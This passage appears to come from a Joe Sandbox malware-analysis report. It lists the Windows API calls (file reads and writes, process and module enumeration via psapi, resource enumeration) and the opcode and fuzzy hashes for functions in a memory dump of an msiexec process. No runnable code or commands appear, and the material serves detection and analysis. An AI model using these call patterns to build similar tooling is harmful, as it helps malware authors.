                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID: 3150196962-0
                                                                                                                                                                                                          • Opcode ID: e8610485fa55ef6227a98938b97cf07d3e826c2ed4ae4196069be0aa637d7783
                                                                                                                                                                                                          • Instruction ID: 35a9ad0fe6b4507ee66bae46934dcfd2e139bf0842d10804986ce3ee8b034d80
                                                                                                                                                                                                          • Opcode Fuzzy Hash: e8610485fa55ef6227a98938b97cf07d3e826c2ed4ae4196069be0aa637d7783
                                                                                                                                                                                                          • Instruction Fuzzy Hash: BBF0A4311447126AE6306B7AAC02BE762849F00725F10862EB425D55D1EFA8D5C046AC
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • SetFilePointerEx.KERNELBASE(0040627C,?,?,00000000,00000000,00000000,004068F9,00000000,00000000,?,00000000,0040627C), ref: 004062C2
                                                                                                                                                                                                            • Part of subcall function 0040A2EF: ReadFile.KERNELBASE(00000000,00000000,004450DD,00000000,00000000,?,?,004450DD,00000000,00000000), ref: 0040A306
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000009.00000002.144189493558.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_9_2_400000_msiexec.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: File$PointerRead
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID: 3154509469-0
                                                                                                                                                                                                          • Opcode ID: f15afef8f4b97f48ba7652cd85e3a24bc41a353f13de395cadc5358a8aad8795
                                                                                                                                                                                                          • Instruction ID: d794e9b43e5f56b2d2e2073d65b81241c22a9a75ad02cc9b2284f18e77a2fe0f
                                                                                                                                                                                                          • Opcode Fuzzy Hash: f15afef8f4b97f48ba7652cd85e3a24bc41a353f13de395cadc5358a8aad8795
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 45E01276100100FFE6619B05DC06F57FBB9FBD4710F14883DB59596174C6326851CB25
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • GetPrivateProfileIntW.KERNEL32(?,?,?,?), ref: 00414588
                                                                                                                                                                                                            • Part of subcall function 004143F1: memset.MSVCRT ref: 00414410
                                                                                                                                                                                                            • Part of subcall function 004143F1: _itow.MSVCRT ref: 00414427
                                                                                                                                                                                                            • Part of subcall function 004143F1: WritePrivateProfileStringW.KERNEL32(?,?,00000000), ref: 00414436
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000009.00000002.144189493558.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_9_2_400000_msiexec.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: PrivateProfile$StringWrite_itowmemset
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID: 4232544981-0
                                                                                                                                                                                                          • Opcode ID: 58bd15f6e23597088465cc0f12acd7a0529fd6d647dc9a4ec136155e63c93ad6
                                                                                                                                                                                                          • Instruction ID: 104e910b762de94586eb11e4c264cf061db1895f8dce3fe8c281d71359574313
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 58bd15f6e23597088465cc0f12acd7a0529fd6d647dc9a4ec136155e63c93ad6
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 8EE09232000209ABDF125F91EC01AA93B66FF54315F548469F95C05520D33295B0AB59
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • FreeLibrary.KERNELBASE(?,?,004452FB,?,?,?,0040333C,?), ref: 00444A65
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000009.00000002.144189493558.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_9_2_400000_msiexec.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: FreeLibrary
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID: 3664257935-0
                                                                                                                                                                                                          • Opcode ID: 8c39ef9eaf727128d218f1dddc73c1f621731b9859e7ea9690b0e693fd97a8de
                                                                                                                                                                                                          • Instruction ID: 9043d1e372537a54137ae43dcd20834ee918eeaa55a47e8e1dedab4d47514996
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 8c39ef9eaf727128d218f1dddc73c1f621731b9859e7ea9690b0e693fd97a8de
                                                                                                                                                                                                          • Instruction Fuzzy Hash: E2E0F6B5900B018FD3708F1BE944406FBF8BFE56113108A1FD4AAC2A24D7B4A1898F54
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                            • Part of subcall function 00413F4F: GetProcAddress.KERNEL32(00000000,psapi.dll), ref: 00413F6F
                                                                                                                                                                                                            • Part of subcall function 00413F4F: GetProcAddress.KERNEL32(?,EnumProcessModules), ref: 00413F7B
                                                                                                                                                                                                            • Part of subcall function 00413F4F: GetProcAddress.KERNEL32(?,GetModuleFileNameExW), ref: 00413F87
                                                                                                                                                                                                            • Part of subcall function 00413F4F: GetProcAddress.KERNEL32(?,EnumProcesses), ref: 00413F93
                                                                                                                                                                                                            • Part of subcall function 00413F4F: GetProcAddress.KERNEL32(?,GetModuleInformation), ref: 00413F9F
                                                                                                                                                                                                          • K32GetModuleFileNameExW.KERNEL32(00000104,00000000,00413E1F,00000104,00413E1F,00000000,?), ref: 00413F46
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000009.00000002.144189493558.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_9_2_400000_msiexec.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: AddressProc$FileModuleName
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID: 3859505661-0
                                                                                                                                                                                                          • Opcode ID: 115f5329003125d907eaa6c1792e5f10a4de8ddb58c38107801da2991a4e6f4b
                                                                                                                                                                                                          • Instruction ID: eb737a8a997ed41d0f7a348c178ce8d4b8225706e43eb580f21eee6dbde26bc7
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 115f5329003125d907eaa6c1792e5f10a4de8ddb58c38107801da2991a4e6f4b
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 6FD02231B083007BEA20EE70CC00FCBA2F47F40F12F008C5AB191D2080C374C9495305
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • ReadFile.KERNELBASE(00000000,00000000,004450DD,00000000,00000000,?,?,004450DD,00000000,00000000), ref: 0040A306
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000009.00000002.144189493558.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_9_2_400000_msiexec.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: FileRead
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID: 2738559852-0
                                                                                                                                                                                                          • Opcode ID: 954c46e0e75d823fede48ea8c55c2feae074eed5d1d1543d384a91c6a040f523
                                                                                                                                                                                                          • Instruction ID: df780c2d30ec27a436fe2e8938b9b3026ee6fdf868a35847a3a0dbf755fefbc9
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 954c46e0e75d823fede48ea8c55c2feae074eed5d1d1543d384a91c6a040f523
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 6DD0C97505020DFBDF01CF81DC06FDD7B7DFB05359F108054BA0095060C7759A15AB55
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • WriteFile.KERNELBASE(?,00000009,?,00000000,00000000,?,?,00402F9B,?,00000000,00000000,00000000,0000017E), ref: 0040A325
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000009.00000002.144189493558.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_9_2_400000_msiexec.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: FileWrite
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID: 3934441357-0
                                                                                                                                                                                                          • Opcode ID: ceb9d1a6229db680868981d1c52190471358147ed4569e3c2bde9500725be326
                                                                                                                                                                                                          • Instruction ID: 3280266517864b8de079c100525e5277478ec149926fcdeece843fe2c70d8c86
                                                                                                                                                                                                          • Opcode Fuzzy Hash: ceb9d1a6229db680868981d1c52190471358147ed4569e3c2bde9500725be326
                                                                                                                                                                                                          • Instruction Fuzzy Hash: CFD0C93501020DFBDF01CF81DC06FDD7BBDFB04359F108054BA1095060D7B59A20AB94
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • FreeLibrary.KERNELBASE(00000000,004457F2,00000000,000001F7,00000000), ref: 00413D30
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000009.00000002.144189493558.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_9_2_400000_msiexec.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: FreeLibrary
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID: 3664257935-0
                                                                                                                                                                                                          • Opcode ID: 4aed56dde2bff02888507ea152729a1ee15f70291d16ca6bd798c1e7fc2ec88c
                                                                                                                                                                                                          • Instruction ID: 8f6381f957debc367d4a0444659be52de1bfd3a154b3998764173f6a98a011bd
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 4aed56dde2bff02888507ea152729a1ee15f70291d16ca6bd798c1e7fc2ec88c
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 1DD0C9765002229BDB10AF26EC057857378FF00712B110425E810B7594D778BEE68ADC
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,00000000,00000000,0044509F,00000000,?,00000000,00000104,00445E7E,?,?), ref: 004096D5
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000009.00000002.144189493558.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_9_2_400000_msiexec.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: CreateFile
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID: 823142352-0
                                                                                                                                                                                                          • Opcode ID: 5246709bc6ec1dabf70528f5ad42ffc01d78c7e2d09fe5df7c46969d7a5ea179
                                                                                                                                                                                                          • Instruction ID: 15e4bfb1af8ab284213ec8af4af1ca3ed9a3c322684c6da9746693c795416a08
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 5246709bc6ec1dabf70528f5ad42ffc01d78c7e2d09fe5df7c46969d7a5ea179
                                                                                                                                                                                                          • Instruction Fuzzy Hash: A8C092B0280200BEFE224B10EC15F36755CE744700F2008247E40F40E0C1605E108524
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • CreateFileW.KERNELBASE(00000001,40000000,00000001,00000000,00000002,00000000,00000000,0040E0F1,00000104), ref: 004096EE
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000009.00000002.144189493558.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_9_2_400000_msiexec.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: CreateFile
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID: 823142352-0
                                                                                                                                                                                                          • Opcode ID: ab7a8cdf7eb8bf952c1c1b88a04d9996938fd5cdd98684eb6691b5f60f9c195d
                                                                                                                                                                                                          • Instruction ID: 13aef0f41518da9c32968a96bed17b980f0e8f352a8d1793a660c4ee04e7d177
                                                                                                                                                                                                          • Opcode Fuzzy Hash: ab7a8cdf7eb8bf952c1c1b88a04d9996938fd5cdd98684eb6691b5f60f9c195d
                                                                                                                                                                                                          • Instruction Fuzzy Hash: B8C012F02903007EFF204B10AC0AF37755DF784700F2048207E40F40E1C2B15C008524
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • ??3@YAXPAX@Z.MSVCRT(00000000,00401B44,0044E518,?,00000001,00401B95,?,00401EE4), ref: 0040B052
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000009.00000002.144189493558.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_9_2_400000_msiexec.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: ??3@
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID: 613200358-0
                                                                                                                                                                                                          • Opcode ID: ffbe44a51c26d842ca56a491b3c7d92fb1c4d2adc00a6a519549e0909776451f
                                                                                                                                                                                                          • Instruction ID: 6ff791ec813821c2e9e24527ebed0d702daabad41f6d5d50af9b89e3d4ad0470
                                                                                                                                                                                                          • Opcode Fuzzy Hash: ffbe44a51c26d842ca56a491b3c7d92fb1c4d2adc00a6a519549e0909776451f
                                                                                                                                                                                                          • Instruction Fuzzy Hash: ADC09BB15117014BE7305F15D40471373D49F11727F318C1DA5D1914C2D77CD4408518
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • FreeLibrary.KERNELBASE(?,00413603,00000000,0044557A,?,?,?,?,?,00403335,?), ref: 004135EC
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000009.00000002.144189493558.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_9_2_400000_msiexec.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: FreeLibrary
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID: 3664257935-0
                                                                                                                                                                                                          • Opcode ID: 844f7501f44133ba018c3401d7aef3826eb6c790b17bce713828cee3c51aa695
                                                                                                                                                                                                          • Instruction ID: 97b2006ec1e2dd28fddd19cbcf35086f2a6b1d7d6d8af37d8808782836c913ed
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 844f7501f44133ba018c3401d7aef3826eb6c790b17bce713828cee3c51aa695
                                                                                                                                                                                                          • Instruction Fuzzy Hash: C1C04C355107129BE7318F22C849793B3E8BB00767F40C818A56A85454D7BCE594CE28
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • EnumResourceNamesW.KERNELBASE(?,?,Function_000148B6,00000000), ref: 0041494B
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000009.00000002.144189493558.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_9_2_400000_msiexec.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: EnumNamesResource
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID: 3334572018-0
                                                                                                                                                                                                          • Opcode ID: 66f1156765df5e37ef2ff2f84c2d9879992723494834984b76c3e66af834c78a
                                                                                                                                                                                                          • Instruction ID: 4cd0fc1a45efe5f4a77ff86a676eea9814a6d41529a344ef69fdb726e0e13cac
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 66f1156765df5e37ef2ff2f84c2d9879992723494834984b76c3e66af834c78a
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 5CC09B355943819FD711DF108C05F1A76D5BF95705F104C397151940A0C7614014A60A
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • FreeLibrary.KERNELBASE(?), ref: 0044DEB6
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000009.00000002.144189493558.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_9_2_400000_msiexec.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: FreeLibrary
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID: 3664257935-0
                                                                                                                                                                                                          • Opcode ID: bc29afbdeb633a61cc40634aee98d5405fe4c9068b08d77425fcd78e2ed3a7cd
                                                                                                                                                                                                          • Instruction ID: c12df66a07a312a107e4de7a98dbd39cb061029a89fa16cd2619b088cce9516a
                                                                                                                                                                                                          • Opcode Fuzzy Hash: bc29afbdeb633a61cc40634aee98d5405fe4c9068b08d77425fcd78e2ed3a7cd
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 95C04C35D10311ABFB31AB11ED4975232A5BB00717F52006494128D065D7B8E454CB2D
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • FindClose.KERNELBASE(?,0040AE21,?,00000000,00445EF5,*.*,?,00000000,?,00000104,?,?,?,?,?,00000104), ref: 0040AEC8
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000009.00000002.144189493558.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_9_2_400000_msiexec.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: CloseFind
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID: 1863332320-0
                                                                                                                                                                                                          • Opcode ID: c351b702f3e9cabc65afcca29c8835cc335007c1b5069ed2425bca2f993f3ba3
                                                                                                                                                                                                          • Instruction ID: 0a5868f0c47a417661f40efe111cada53839b745ef6d73ffe26d621af3302058
                                                                                                                                                                                                          • Opcode Fuzzy Hash: c351b702f3e9cabc65afcca29c8835cc335007c1b5069ed2425bca2f993f3ba3
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 06C092341506058BD62C5F38DC9A42A77A0BF4A3303B40F6CA0F3D24F0E73888538A04
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • GetFileAttributesW.KERNELBASE(?,00445E12,?,?,?,00000104), ref: 00409B9C
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000009.00000002.144189493558.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_9_2_400000_msiexec.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: AttributesFile
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID: 3188754299-0
                                                                                                                                                                                                          • Opcode ID: 58881c252121c77da0d0db5638804f50f66f4a7a85cb6d231bcd6b2301be346c
                                                                                                                                                                                                          • Instruction ID: 3e515636d229e53f9e638efbf3d1d2cf0185fd636b5c9b7db17c068ea44c501e
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 58881c252121c77da0d0db5638804f50f66f4a7a85cb6d231bcd6b2301be346c
                                                                                                                                                                                                          • Instruction Fuzzy Hash: B9B012792104005BCB0807349C4904D35507F456317200B3CF033C00F0D730CC61BA00
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000009.00000002.144189493558.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_9_2_400000_msiexec.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                          • Opcode ID: 519045b8856ea86e6d8d1e97e8a9a2cac293cdb0bbecd69caab4774d1a49c2e8
                                                                                                                                                                                                          • Instruction ID: 186a7b248be49691fb09735f75239c469d17650efe27a5986e87276cb9a2b443
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 519045b8856ea86e6d8d1e97e8a9a2cac293cdb0bbecd69caab4774d1a49c2e8
                                                                                                                                                                                                          • Instruction Fuzzy Hash: E8318B31901616EFDF24AF25D8417DA73A0FF04314F10416BF91497251DB38ADE18BDA
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • memset.MSVCRT ref: 004095FC
                                                                                                                                                                                                            • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                                                                                                                                                                            • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                                                                                                                                                                            • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                                                                                                                                                                            • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                                                                                                                                                                            • Part of subcall function 00409B98: GetFileAttributesW.KERNELBASE(?,00445E12,?,?,?,00000104), ref: 00409B9C
                                                                                                                                                                                                            • Part of subcall function 004091B8: memset.MSVCRT ref: 004091E2
                                                                                                                                                                                                            • Part of subcall function 004091B8: memcpy.MSVCRT(?,00000000,?,?,?,?,?,?,?,?,?,?,00000143,00000000), ref: 004092C9
                                                                                                                                                                                                            • Part of subcall function 004091B8: memcmp.MSVCRT(00000000,0045A4F0,00000006,?,?,?,?,?,?,?,?,?,?,?,?,00000143), ref: 004092D9
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000009.00000002.144189493558.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_9_2_400000_msiexec.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: memsetwcslen$AttributesFilememcmpmemcpywcscatwcscpy
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID: 3655998216-0
                                                                                                                                                                                                          • Opcode ID: e30004be4bbbfeced16a1849f7c4d541b3adc094efc719b7744e08ea692a1bc4
                                                                                                                                                                                                          • Instruction ID: 072a19641c33d96fdc78833b4ff670bebeeceb9371718ab52934a970b5968781
                                                                                                                                                                                                          • Opcode Fuzzy Hash: e30004be4bbbfeced16a1849f7c4d541b3adc094efc719b7744e08ea692a1bc4
                                                                                                                                                                                                          • Instruction Fuzzy Hash: F311607290021D6AEF20A662DC4AE9B376CEF41318F10047BB908E51D2EA79DE548659
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • memset.MSVCRT ref: 00445426
                                                                                                                                                                                                            • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                                                                                                                                                                            • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                                                                                                                                                                            • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                                                                                                                                                                            • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                                                                                                                                                                            • Part of subcall function 00409B98: GetFileAttributesW.KERNELBASE(?,00445E12,?,?,?,00000104), ref: 00409B9C
                                                                                                                                                                                                            • Part of subcall function 0040B6EF: memset.MSVCRT ref: 0040B71C
                                                                                                                                                                                                            • Part of subcall function 0040B6EF: wcsrchr.MSVCRT ref: 0040B738
                                                                                                                                                                                                            • Part of subcall function 0040B6EF: memset.MSVCRT ref: 0040B756
                                                                                                                                                                                                            • Part of subcall function 0040B6EF: memset.MSVCRT ref: 0040B7F5
                                                                                                                                                                                                            • Part of subcall function 0040B6EF: CreateFileW.KERNELBASE(00445FAE,80000000,00000000,00000000,00000003,00000000,00000000,?,?), ref: 0040B80C
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000009.00000002.144189493558.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_9_2_400000_msiexec.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: memset$Filewcslen$AttributesCreatewcscatwcscpywcsrchr
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID: 1828521557-0
                                                                                                                                                                                                          • Opcode ID: ea4a949cbb04dc179977b6e9e50e7a1e4e6e0668b18cbdf2d6b9d2270a501428
                                                                                                                                                                                                          • Instruction ID: 9d1500c39017731ad640c46c84131142cb98d7893e2d711cbdbff08f65233ce4
                                                                                                                                                                                                          • Opcode Fuzzy Hash: ea4a949cbb04dc179977b6e9e50e7a1e4e6e0668b18cbdf2d6b9d2270a501428
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 4B1186B294011D7BEB10E751DC4AFDB776CEF51328F10047FB518A50C2E6B8AAC486A9
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000009.00000002.144189493558.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_9_2_400000_msiexec.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: _wcsicmp
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID: 2081463915-0
                                                                                                                                                                                                          • Opcode ID: 8ecd19cd50b91feb9ece7647b88d70c74935930258f67524a15d6916c2203edb
                                                                                                                                                                                                          • Instruction ID: 44e68c08f8902dbc9d3bec9e3d7b81d72528a2b8c41660eeece459a1934edfa0
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 8ecd19cd50b91feb9ece7647b88d70c74935930258f67524a15d6916c2203edb
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 0C118CB1600205AFD710DF65C8809AAB7F8FF44314F11843EE55AE7240EB34F9658B68
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                            • Part of subcall function 00406294: CloseHandle.KERNEL32(000000FF,00406224,00000000,00000000,0040E03C,?,00000000,00000104,00000000,?,?,?,0040E521,?,0040E6A3,000000FF), ref: 0040629C
                                                                                                                                                                                                            • Part of subcall function 004096C3: CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,00000000,00000000,0044509F,00000000,?,00000000,00000104,00445E7E,?,?), ref: 004096D5
                                                                                                                                                                                                          • GetLastError.KERNEL32(00000000,00000000,0040E03C,?,00000000,00000104,00000000,?,?,?,0040E521,?,0040E6A3,000000FF,?,00000104), ref: 00406281
                                                                                                                                                                                                            • Part of subcall function 0040A2EF: ReadFile.KERNELBASE(00000000,00000000,004450DD,00000000,00000000,?,?,004450DD,00000000,00000000), ref: 0040A306
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000009.00000002.144189493558.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_9_2_400000_msiexec.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: File$CloseCreateErrorHandleLastRead
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID: 2136311172-0
APIs
  • Part of subcall function 0040B04B: ??3@YAXPAX@Z.MSVCRT(00000000,00401B44,0044E518,?,00000001,00401B95,?,00401EE4), ref: 0040B052
• ??2@YAPAXI@Z.MSVCRT(00000001,00000001,00401E7F), ref: 0040AFD8
Memory Dump Source
• Source File: 00000009.00000002.144189493558.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_9_2_400000_msiexec.jbxd
Similarity
• API ID: ??2@??3@
• String ID:
• API String ID: 1936579350-0
APIs
Memory Dump Source
• Source File: 00000009.00000002.144189493558.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_9_2_400000_msiexec.jbxd
Similarity
• API ID: free
• String ID:
• API String ID: 1294909896-0
APIs
Memory Dump Source
• Source File: 00000009.00000002.144189493558.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_9_2_400000_msiexec.jbxd
Similarity
• API ID: free
• String ID:
• API String ID: 1294909896-0
APIs
Memory Dump Source
• Source File: 00000009.00000002.144189493558.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_9_2_400000_msiexec.jbxd
Similarity
• API ID: free
• String ID:
• API String ID: 1294909896-0
APIs
